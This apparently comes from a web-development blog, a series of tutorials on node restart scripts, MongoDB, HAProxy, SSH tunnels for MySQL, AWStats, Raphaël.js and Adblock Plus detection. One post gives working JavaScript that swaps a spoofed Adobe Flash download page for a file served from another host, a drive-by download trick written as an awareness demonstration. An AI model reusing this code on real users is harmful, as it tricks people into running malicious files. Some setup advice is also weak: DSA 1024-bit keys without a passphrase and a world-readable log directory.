Simple node.js monitor and restart bash script

If you don't want to use external tools to ensure your node server is still up and running, you can use a super simple bash script to make sure the server gets restarted whenever it fails.
Just create a bash script in a location of your choice and make sure it is owned by the user that runs your node server. I will use the home folder of my node.js user, which is called 'unode':

mkdir /home/unode/bashscripts/
nano node_restart.sh

Insert the following lines, replacing the paths to your node main app file and to the log files:

#!/bin/sh

NODE_MAIN="node /var/www/node/app.js"

if [ -z "$(pgrep -f -x "$NODE_MAIN")" ]
then
    echo "Restarting $NODE_MAIN."
    cmdNODE="$NODE_MAIN 1> /var/log/node/node.log 2> /var/log/node/error.log &"
    eval $cmdNODE
fi

Save the file and set permissions to allow the bash script to be executed by cron:

chmod 755 /home/unode/bashscripts/node_restart.sh

Finally add a one-minute entry to the system crontab (/etc/crontab; the user field in the line below requires the system crontab, not a per-user one) and you are set:

*/1 *   * * *   unode   /home/unode/bashscripts/node_restart.sh

Now your node.js app will be checked once a minute and restarted if it has stopped. Of course you can easily modify the script to monitor and restart all kinds of other processes as well.
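
That generalization can be sketched as a small helper function (hypothetical, not part of the original script) that reports whether a process, matched by its exact command line just like the pgrep call above, needs a restart:

```shell
#!/bin/sh
# Hypothetical helper sketch: report whether a process needs a restart.
# The argument is matched against the full command line, exactly as the
# script above does with pgrep -f -x.
needs_restart() {
    if [ -z "$(pgrep -f -x "$1")" ]; then
        echo "yes"
    else
        echo "no"
    fi
}

# Example: the node app from above (prints "yes" unless it is running)
needs_restart "node /var/www/node/app.js"
```

From there, restarting any stopped process is just acting on the "yes" case.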

How to install MongoDB on Debian including PHP driver and Munin-Plugin

The following article shows the setup of MongoDB on Debian with PHP support and additional monitoring of MongoDB’s operations, connections and memory usage with Munin. We start by importing the MongoDB public key, adding the MongoDB repository and reloading our repositories:

apt-key adv --keyserver keyserver.ubuntu.com --recv 7F0CEB10
echo 'deb http://downloads-distro.mongodb.org/repo/debian-sysvinit dist 10gen' | sudo tee /etc/apt/sources.list.d/mongodb.list
apt-get update

Now it’s possible to install the MongoDB package:

apt-get install mongodb-10gen

To prevent apt from upgrading the package automatically we can pin it to the version we just installed:

echo "mongodb-10gen hold" | sudo dpkg --set-selections
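
To verify the pin took effect, you can list everything dpkg currently has on hold (a quick sanity check, not required for the setup):

```shell
#!/bin/sh
# List all packages dpkg has marked "hold"; after the command above this
# should include mongodb-10gen. Prints nothing if no package is held.
dpkg --get-selections 2>/dev/null | awk '$2 == "hold" { print $1 }'
```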

That's it. MongoDB should already be up and running; otherwise just start it manually:

/etc/init.d/mongodb start

If you have any trouble with the installation you might find the official tutorial helpful.
Now let’s get to the PHP part. In order to be able to install the MongoDB PHP driver via PECL we first need to install two packages, php-pear and php5-dev:

apt-get install php-pear
apt-get install php5-dev

After that, installation of the PHP driver is easy:

pecl install mongo

Next we need to add the driver to our php.ini to enable it. If you also intend to use the driver via the command line and/or CGI you might need to add it to multiple php.ini files. The paths are most likely the following, but yours may vary:

nano /etc/php5/apache2/php.ini
nano /etc/php5/cli/php.ini
nano /etc/php5/cgi/php.ini

Add the following line:

extension=mongo.so
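
If you prefer to script this step, a guarded append keeps the line from being added twice on repeated runs. This is just a sketch: the /tmp path is a stand-in for demonstration, so point INI at your real php.ini.

```shell
#!/bin/sh
# Idempotent sketch: add "extension=mongo.so" to a php.ini only if missing.
# /tmp/example-php.ini is a throwaway stand-in for /etc/php5/apache2/php.ini.
INI="/tmp/example-php.ini"
rm -f "$INI"
touch "$INI"
grep -q '^extension=mongo.so$' "$INI" || echo 'extension=mongo.so' >> "$INI"
grep -c '^extension=mongo.so$' "$INI"   # prints 1, no matter how often you rerun the append
```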

In order to enable the driver for Apache a server restart is necessary:

/etc/init.d/apache2 restart

Done. Now we are able to use the MongoDB PHP driver. For instructions on how to use it please see the API documentation.
Finally we may also add the Munin plugin for MongoDB to monitor different aspects of the database's performance. In case you have not yet installed Munin itself you can find many tutorials on the net (or just use this one). Once Munin is up and running we can continue with the MongoDB plugin for Munin by installing the mandatory Python package (in case it has not been installed previously):

apt-get install python

Next let's get the plugin files from GitHub, extract them, copy them to Munin's plugin folder and activate them by creating symlinks:

wget https://github.com/erh/mongo-munin/archive/master.zip -O mongo-munin-master.zip
unzip mongo-munin-master.zip
cp mongo-munin-master/mongo_* /usr/share/munin/plugins/
ln -s /usr/share/munin/plugins/mongo_* /etc/munin/plugins/

Finalize integration of MongoDB stats to Munin by forcing an update and restarting munin-node:

sudo -u munin /usr/share/munin/munin-update
/etc/init.d/munin-node restart

If everything was set up correctly we can now see four new graphs in our Munin web interface (current connections, memory usage, operations and write lock percentage).

HAProxy Load Balancer setup including logging on Debian

If you are looking for a fast, reliable and easy-to-configure load balancer, HAProxy might be the right choice for you. In the following post I will explain the quick and easy setup of a basic HAProxy balancer which, in this example, handles two domains, forwards them to three servers and also logs the incoming connections.
Ok, so we start by installing HAProxy:

apt-get install haproxy

Next we can already go ahead and edit the config file (choose your favorite editor, I will be using nano):

nano /etc/haproxy/haproxy.cfg

This file will be our main point of interest for setting up the server. We will insert four different blocks of information to the config file. These blocks are called “global”, “defaults”, “frontend” and “backend”.
We will start with the “global” block, which sets process-wide parameters. In our case it includes information for logging purposes, setting of a maximum of overall connections and open files as well as setting of user and group and daemonizing the balancer. For more detailed information on the possible configuration parameters please see the HAProxy Configuration Manual.

global
 log /dev/log local0 info
 log /dev/log local0 notice
 maxconn 10000
 ulimit-n 20000
 user haproxy
 group haproxy
 daemon

Next comes the "defaults" section, which sets default parameters for the following sections. For a detailed description of the values set here please refer to the documentation, but most of them explain themselves. Do have a look at the last value, "stats auth", though: there you put the credentials (user and password) that grant access to the statistics. Stats will be available at http://your-domain.com/haproxy?stats or http://your-server-ip/haproxy?stats.

defaults
 log global
 mode http
 option httplog
 option dontlognull
 retries 3
 option redispatch
 option forwardfor
 option forceclose
 maxconn 10000
 contimeout 5000
 clitimeout 50000
 srvtimeout 50000
 stats enable
 stats auth user:password

Next we include the "frontend" block, where we define access control lists (ACLs), which enable us to route to different backends based on the domain or other criteria such as the URL path. In this example we will only use a basic differentiation by domain. After defining the ACLs we also assign them to different backends. So, supposing we have our two domains "your-domain.com" and "your-domain2.com", our "frontend" looks like this:

frontend all 0.0.0.0:80
 acl acl_your_domain hdr_dom(host) -i your-domain.com
 acl acl_your_domain2 hdr_dom(host) -i your-domain2.com

 use_backend your_domain if acl_your_domain
 use_backend your_domain2 if acl_your_domain2

Ok, now we only have to assign our servers to the backends "your_domain" and "your_domain2". Since we expect "your_domain" to get a lot more traffic we will assign two of our three servers to that domain. We will also set a cookie for the backend "your_domain" in order to prevent a requesting user from switching servers on every request. Also, do not forget to replace the dummy IPs with your own server IPs.

backend your_domain
 cookie SRVID insert indirect nocache
 server srv_your_domain 1.2.3.4:80 cookie SRVID weight 1 check inter 20000
 server srv2_your_domain 1.2.3.5:80 cookie SRVID weight 1 check inter 20000

backend your_domain2
 server srv_your_domain2 1.2.3.6:80 weight 1 check inter 20000

Almost done. Some minor changes to the default config file are necessary.

nano /etc/default/haproxy

We need to set ENABLED to 1 in order to get all the init scripts working:

ENABLED=1

Ok, only the logging setup is still missing. First we need to tell rsyslog to catch our logs. For that purpose we create a HAProxy config file for rsyslog:

nano /etc/rsyslog.d/haproxy.conf

And then add the following:

if ($programname == 'haproxy' and $syslogseverity-text == 'info') then -/var/log/haproxy/haproxy-info.log
& ~
if ($programname == 'haproxy' and $syslogseverity-text == 'notice') then -/var/log/haproxy/haproxy-notice.log
& ~

Now the final step: configuring log rotation.

nano /etc/logrotate.d/haproxy

Insert the following into the file. This will rotate your HAProxy logs daily and keep them for four weeks.

/var/log/haproxy/*.log {
    daily
    missingok
    rotate 28
    compress
    delaycompress
    notifempty
    create 644 root adm
    sharedscripts
    postrotate
    /etc/init.d/haproxy reload > /dev/null
    endscript
}

Finally…done! You can now (re)start your server and let the balancing begin!

/etc/init.d/haproxy restart

Configuring a permanent SSH tunnel for MySQL connections on Debian

This article shows how to set up a permanent SSH tunnel between a webserver and a database server running MySQL. First of all we will create two new users, one on each server. Of course you may also use existing users, but I prefer to have users dedicated solely to the tunneling job. So we will start with the database server, where we create a new user and enable it to log in via public-key authentication by editing the "sshd_config" file:

adduser ssh-tunnel
nano /etc/ssh/sshd_config

Now add the user to “AllowUsers” and set “PubkeyAuthentication” to “yes”:

AllowUsers ssh-tunnel
PubkeyAuthentication yes

Then restart SSH:

/etc/init.d/ssh restart

Now let's switch to the webserver and create a new user there as well (also install autossh if you haven't already):

aptitude install autossh
adduser ssh-tunnel-mysql

Now add the user to "AllowUsers" in the webserver's "/etc/ssh/sshd_config", just as done before on the database server:

AllowUsers ssh-tunnel-mysql

Also restart SSH here:

/etc/init.d/ssh restart

Now login to the webserver with the newly created user “ssh-tunnel-mysql”. Next you can already try to open a tunnel. But make sure to replace SSH port, MySQL port and IP according to your configuration:

/usr/bin/autossh -M 20042 -N -L 3308:127.0.0.1:3306 -p 22 ssh-tunnel@1.2.3.4

You might get the following error:

Warning: remote port forwarding failed for listen port 20042

It means the port is already in use. In this case just change "20042" to an unused port. Once you have established the tunnel it's time to test it. Do this in a new console window and make sure to use the correct password for the "ssh-tunnel" user:

mysql -h 127.0.0.1 -P 3308 -ussh-tunnel -pPASSWORD

Now you should be connected and able to work with the MySQL database on the database server. Try the following, it should list all your databases that exist on the database server:

SHOW DATABASES;

Since we have confirmed that the tunnel is working we can now create a public key to enable logon without a password. Make sure to execute the following commands on the webserver as the tunnel user (leave the passphrase empty when asked for it):

cd ~
mkdir .ssh
ssh-keygen -t dsa -b 1024 -f ~/.ssh/ssh-tunnel-key

Now you have created a public/private key pair on the webserver. Next the public key has to be added to the authorized_keys file on the database server. For this, log in to the database server as the tunnel user and execute the following commands:

cd ~
mkdir .ssh
chmod 700 .ssh
cd .ssh/
touch authorized_keys
chmod 600 authorized_keys

Now everything is setup on the database server. So we can go back to the webserver and copy the key. Again make sure to be logged in as the tunnel user and change SSH port and IP to yours:

cat ~/.ssh/*.pub | ssh ssh-tunnel@1.2.3.4 -p 22 'umask 077; cat >>.ssh/authorized_keys'
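
The `umask 077` in that one-liner is what makes the remote authorized_keys file end up readable only by its owner. You can observe the effect locally without touching any server; all paths below are throwaway demonstration paths:

```shell
#!/bin/sh
# Local simulation of the append step: the umask ensures the freshly created
# authorized_keys file gets mode 600 (-rw-------).
DEMO="/tmp/demo-ssh-append"
rm -rf "$DEMO"
mkdir -p "$DEMO/.ssh"
echo "ssh-rsa AAAA...demo-key" | ( cd "$DEMO" && umask 077 && cat >> .ssh/authorized_keys )
ls -l "$DEMO/.ssh/authorized_keys" | cut -c1-10   # -rw-------
```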

Now test your connection again, this time by using the key:

/usr/bin/autossh -M 20042 -N -L 3308:127.0.0.1:3306 -p 22 \
-i /home/ssh-tunnel-mysql/.ssh/ssh-tunnel-key ssh-tunnel@1.2.3.4

Everything working without a password now? Then you can put the tunnel in the background by using the parameter “-f”. This way your tunnel will remain active even when you close your console window:

/usr/bin/autossh -M 20042 -f -N -L 3308:127.0.0.1:3306 -p 22 \
-i /home/ssh-tunnel-mysql/.ssh/ssh-tunnel-key ssh-tunnel@1.2.3.4
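
If you run several tunnels, each autossh instance needs its own free "-M" monitoring port (the "remote port forwarding failed" warning from earlier means the port was taken). A small probe loop can find one; this sketch uses `ss`, and on systems without it the check matches nothing and the starting port is simply accepted:

```shell
#!/bin/sh
# Probe upwards from 20042 until a TCP port is found that nothing listens on.
PORT=20042
while ss -ltn 2>/dev/null | grep -q ":$PORT "; do
    PORT=$((PORT + 1))
done
echo "$PORT"
```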

If you want to close the tunnel you can use the "kill" command with the PID of the tunnel or, if the user exists solely for tunneling, simply execute "killall":

killall -u ssh-tunnel-mysql

That's it. If anything is missing, wrong, or any problems occur please let me know via my contact form.

How to install, automate and secure AWStats including GeoIP-Plugin on Debian

If you don't want to use a 3rd-party website analytics tool such as Google Analytics but still want to monitor your visitors, pageviews and so on, then AWStats might be the right tool for you. It works server-side by analyzing your logfiles and creating a simple graphical report of the most important information about your visitors. Although it is not as detailed as most frontend analytics tools it still provides a very good overview.
This is how installation works on Debian, assuming you are running Apache2 server:

apt-get install awstats

The Debian package does not automatically set the correct paths in the AWStats configuration script, so we have to do this manually (for all text editing just use your favorite editor; I will be using nano throughout this tutorial):

nano /usr/share/doc/awstats/examples/awstats_configure.pl
$AWSTATS_PATH='/usr/share/awstats';
$AWSTATS_ICON_PATH='/usr/share/awstats/icon';
$AWSTATS_CSS_PATH='/usr/share/awstats/css';
$AWSTATS_CLASSES_PATH='/usr/share/awstats/lib';
$AWSTATS_CGI_PATH='/usr/lib/cgi-bin';
$AWSTATS_MODEL_CONFIG='/usr/share/doc/awstats/examples/awstats.model.conf';
$AWSTATS_DIRDATA_PATH='/var/lib/awstats';

Now the configuration should be ok. In the next step we have to make the AWStats CGI script owned by the Apache user, most probably www-data:

chown www-data /usr/lib/cgi-bin/awstats.pl

Now AWStats is already up and running, but we are still far from done. Next we should check the Apache configuration for the following lines and add them if not present (this enables the AWStats icons for our AWStats info page):

nano /etc/apache2/apache2.conf
Alias /awstats-icon/ /usr/share/awstats/icon/
<Directory /usr/share/awstats/icon>
    Options None
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

Ok. The next thing to do is updating some settings in our AWStats configuration file. We need to set the correct path to our Apache access log and set our site domain; I would also suggest changing the default LogFormat and disabling DNSLookup.

nano /etc/awstats/awstats.conf
LogFile="/var/log/apache2/access.log"
LogFormat=1
SiteDomain="webdevwonders.com"
DNSLookup=0

Now we can try to run AWStats for the first time (remember to fill in your domain name instead of mine):

/usr/lib/cgi-bin/awstats.pl -config=webdevwonders.com -update
/usr/lib/cgi-bin/awstats.pl -config=webdevwonders.com

If you get an error message with one or the other command you might want to check your configuration settings once again. One problem that might occur is access denied to the apache log. Fix it like this and try executing the commands from above once again:

chmod 755 /var/log/apache2

If everything works we can continue by enabling browser access to our statistics:

chown www-data /usr/lib/cgi-bin/awstats.pl

Now try to open the AWStats statistics in your browser. The path should look like this (again of course your own domain name): http://webdevwonders.com/cgi-bin/awstats.pl. If you receive a 504 Gateway Timeout you will have to increase the timeout value inside apache2.conf. Something between 20 and 60 seconds should be enough.
Now next is the automation of our statistics by adding a cronjob that will automatically update them:

nano /etc/crontab

Add the following line for a 15 minute crontab or change the update cycle according to your needs (adjust domain name as usual).

*/15 *   * * *   root    /usr/lib/cgi-bin/awstats.pl -config=webdevwonders.com -update

Now let’s protect our statistics from prying eyes. We are doing this by adding a .htaccess file to our “cgi-bin”-directory:

cd /usr/lib/cgi-bin/
touch .htaccess
nano .htaccess

Now insert the following (please note that for this tutorial we will simply put the .htpasswd file in “/var/www/awstats” but you might consider putting it somewhere else).

<FilesMatch "awstats.pl">
    AuthName "Login Required"
    AuthType Basic
    AuthUserFile /var/www/awstats/.htpasswd
    require valid-user
</FilesMatch>

Now create the .htpasswd file (remember to fill in your own username):

cd /var/www/
mkdir awstats
cd awstats
htpasswd -c /var/www/awstats/.htpasswd username
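
If htpasswd happens to be missing (it ships with the apache2-utils package), the same kind of file can be built with openssl's apr1 hashing, which Apache's basic auth understands. This is an alternative sketch with a throwaway path and dummy credentials, not the method used above:

```shell
#!/bin/sh
# Build an .htpasswd-style entry without htpasswd, using openssl's apr1 (MD5)
# scheme. Username, password and file path are dummies for demonstration.
USER="username"
PASS="secret"
HTFILE="/tmp/demo-htpasswd"
echo "$USER:$(openssl passwd -apr1 "$PASS")" > "$HTFILE"
cut -d: -f1 "$HTFILE"   # prints: username
```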

Almost done, but we have to enable “AllowOverride” for the “cgi-bin”-directory to have Apache make use of our access rule. So edit the part inside your VirtualHost configuration:

nano /etc/apache2/sites-available/default
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
    AllowOverride All
    ...
</Directory>

One more thing: Restart Apache.

/etc/init.d/apache2 restart

Check your AWStats URL once again; it should now be protected. AWStats is fine like this and will already show you lots of nice info about your visitors, but there is one more "nice to have" module called GeoIP. It will show you the country your visitors are located in, even with a nice country flag icon!
Before we can start installing GeoIP we need to install the GNU GCC Compiler, which is included in the “build-essential”-package, as well as the library zlib:

apt-get install build-essential
wget http://zlib.net/zlib-1.2.7.tar.gz
tar xvzf zlib-1.2.7.tar.gz
cd zlib-1.2.7
./configure --prefix=/usr/local/zlib && make && make install

Now let’s go ahead and download and install the GeoIP plugin:

wget http://maxmind.com/download/geoip/api/c/GeoIP.tar.gz
tar xzvf GeoIP.tar.gz
cd GeoIP*
./configure && make && make install

Although installation should work, in some cases you might get an error like this:

checking for zlib.h... no
configure: error: Zlib header (zlib.h) not found. Tor requires zlib to build.
You may need to install a zlib development package.

This problem can be fixed by installing the zlib1g-dev package. Afterwards retry the installation:

apt-get install zlib1g-dev
./configure && make && make install

Now continue by removing all previous installation files and finish the installation of GeoIP via CPAN:

cd ..
cd ..
rm -rfv zlib*
cpan
install Geo::IP
quit

One final step: check in your AWStats configuration that the GeoIP LoadPlugin line is enabled and the path is set correctly:

nano /etc/awstats/awstats.conf
LoadPlugin="geoip GEOIP_STANDARD /usr/local/share/GeoIP/GeoIP.dat"

Now, just for the sake of making sure everything is enabled, let’s restart Apache once more:

/etc/init.d/apache2 restart

And that’s it! Hopefully you will have AWStats up and running as expected. If anything in this tutorial is missing, not working or simply wrong please let me know via my contact form so I can update the tutorial accordingly. Thanks!

How to animate a rectangle bottom up with Raphaël.js

Since I did not find an easy way to animate a rectangle bottom-up with Raphaël.js while searching the net, I thought it might be helpful to post my simple solution. So here it is:

// Create options object that specifies the rectangle
var rect_opt = {
    width: 100,
    height: 200,
    x: 0,
    y: 0
};
 
// Container that will contain animation (suppose document contains a div with id 'raphael')
var div = document.getElementById('raphael');
 
// Create new raphael object
var ctx = new Raphael(div, rect_opt.width, rect_opt.height);
 
// Set animation speed
var speed = 10000;
 
/*
 * Create rectangle object with y-position at bottom by setting it to the specified height,
 * also give the rectangle a height of '0' to make it invisible before animation starts
 */
var rect = ctx.rect(rect_opt.x, rect_opt.height, rect_opt.width, 0);
 
// Color the rectangle nicely
rect.attr({
    fill:'#289CFE',
    stroke:'none'
});
 
/*
 * Animate the rectangle from bottom up by setting the height to the earlier specified
 * height and by setting the y-position to the top of the rectangle
 */
rect.animate({
    y:rect_opt.y,
    height:rect_opt.height
}, speed);

And here is how it looks in action (infinite loop):

Fix for wkhtmltopdf rendering issue when using SVG

I recently spent some hours trying to find out why my SVG graph wasn't rendering properly with wkhtmltopdf. Since the same problem might occur to others I wanted to share it here. So this is the issue: wkhtmltopdf seems to have a problem with rendering when you use "stroke-dasharray" inside an SVG with a value of "0", which may be used to set a path to a continuous line. Whenever this is used, wkhtmltopdf will fail to render the SVG properly (see the bug report for further info).
If this happened to you while using Raphaël.js you can fix it by updating a value inside the library. Raphaël.js uses a "0" for "stroke-dasharray" whenever you either leave the value empty or use "none" as the value. Inside the library, look for the place where an object "dasharray" is initialized (right above the definition of the function "addDashes"). You can replace both zeros with a very high value, e.g. 99999. It only needs to be higher than the pixel length of your path, because then the path will still be shown as a continuous line.

Malicious file download – and nobody will notice

I recently came across a very sneaky yet impressive way of tricking people into downloading a malicious file. But before you continue reading you might want to download the newest Flash Player version?! Yeah, I know Flash is dead, but please give it a try anyway and see if you notice anything strange about it…
Done? Ok. So what you just downloaded was, of course, not a new Flash Player version but a possibly malicious file from my website. Maybe you noticed that the file was requested from webdevwonders.com instead of adobe.com.
The name of the domain is actually the only easy way to notice that you are downloading a different file from another server than expected. Now imagine a malicious download from a domain like flashplayer-download.com. How many people would be suspicious, even if they read the name of the file host?
But let's have a look at the code now (by the way, this will NOT work in Internet Explorer):

// Called 'onclick' of the link
function openFlashWebsite() {
    // http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer
    window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer">', 'foo');
    setTimeout(triggerDownload, 4500);
}
// Will be called after a timeout of 4.5 secs
function triggerDownload() {
  window.open('http://webdevwonders.com/download/flashplayer', 'foo');
}

Now what is happening here? First, the function "openFlashWebsite" is called by clicking the link. It opens a new window (or tab) with a "text/html" data URI that immediately navigates to the Flash Player download site via a meta refresh. Second, the function also starts a timeout, which fires after 4.5 seconds and opens a document served with a "Content-Disposition: attachment;" header, triggering the download of a file called "flashplayer_11.exe", which is served by this blog. The sneaky thing about it is that this download gets attached directly to the already opened site, which by then is the Adobe Flash Player download site, tricking the user into thinking that this is the expected Flash Player download. This is made possible by the fact that web browser documents are able to navigate other (cross-origin) windows to arbitrary URLs. A deeper explanation of the issue is given in "The Tangled Web" by Michal Zalewski, whose blog also deserves the credit for this.

Please vote: How useful was this post for you?
Current rating:
(4 out of 5)
Posted in HTML/CSS, Javascript, Security/Privacy | Tagged , , , , , | Leave a comment

Deep copy Javascript objects

Knowing the difference between a value being assigned by reference and a value being assigned by value is crucial. In Javascript, primitive types like strings or numbers are always assigned by value. So assigning a variable A to a variable B results in variable B containing a "real" copy of variable A. Changing the value of variable B afterwards won't change the value of variable A.
However, when assigning an object A to an object B in Javascript, object B is assigned by reference, meaning that both variables point to the same object. In this case changing a property in object B will change the property in object A as well. See the following example:

var object_a = {url:"webdevwonders.com"};
var object_b = object_a;
object_b.url = "google.com";
alert(object_a.url); // Alerts "google.com"

Object A's property "url" has changed to "google.com", because the variable object_a points to the same object as the variable object_b. That's fine, but in quite a lot of cases a real copy is what you want. One solution is to loop over each property of object A and assign its value to the corresponding property of object B. Note that this copies only one level: if a property itself holds an object, that nested object will still be shared, so truly nested structures need a recursive approach. The following code accomplishes the single-level copy:

var object_a = {url:"webdevwonders.com"};
var object_b = {};
for (var prop in object_a) {
    object_b[prop] = object_a[prop];
}
object_b.url = "google.com";
alert(object_a.url); // Alerts "webdevwonders.com"

If you’re using jQuery there’s a far more elegant way to solve the problem:

var object_a = {url:"webdevwonders.com"};
var object_b = jQuery.extend(true, {}, object_a);
object_b.url = "google.com";
alert(object_a.url); // Alerts "webdevwonders.com"

Detect Firefox add-on Adblock Plus

Some time ago I wrote a post explaining how to detect Firefox add-ons. The described way only works for a couple of add-ons, though, and it doesn't work for the most popular add-on of all: Adblock Plus. But there is an even simpler way to detect whether a visitor coming to your website has activated Adblock Plus.
Since Adblock Plus blocks URLs and hides containers using naming patterns (e.g. hiding all elements on a website containing the class "ad-column"), it is possible to trigger the add-on into hiding an element on the page and then check with a simple JS script whether it is still visible or hidden, the latter meaning that the visitor has Adblock Plus up and running.

The following script detects Adblock Plus by checking if the container with the id “adright” is hidden (using jQuery):

<div id="adright"></div>
<script type="text/javascript">
if ($("#adright").is(":hidden")) {
    alert("Adblock Plus activated!");
} else {
    alert("Adblock Plus NOT activated!");
}
</script>


The script above works for the standard English filter subscription of Adblock Plus but might not work for other country-specific subscriptions. For a complete overview of the URLs and containers blocked by your filter subscriptions have a look at the filter rules in the Adblock Plus preferences and adjust the script accordingly.
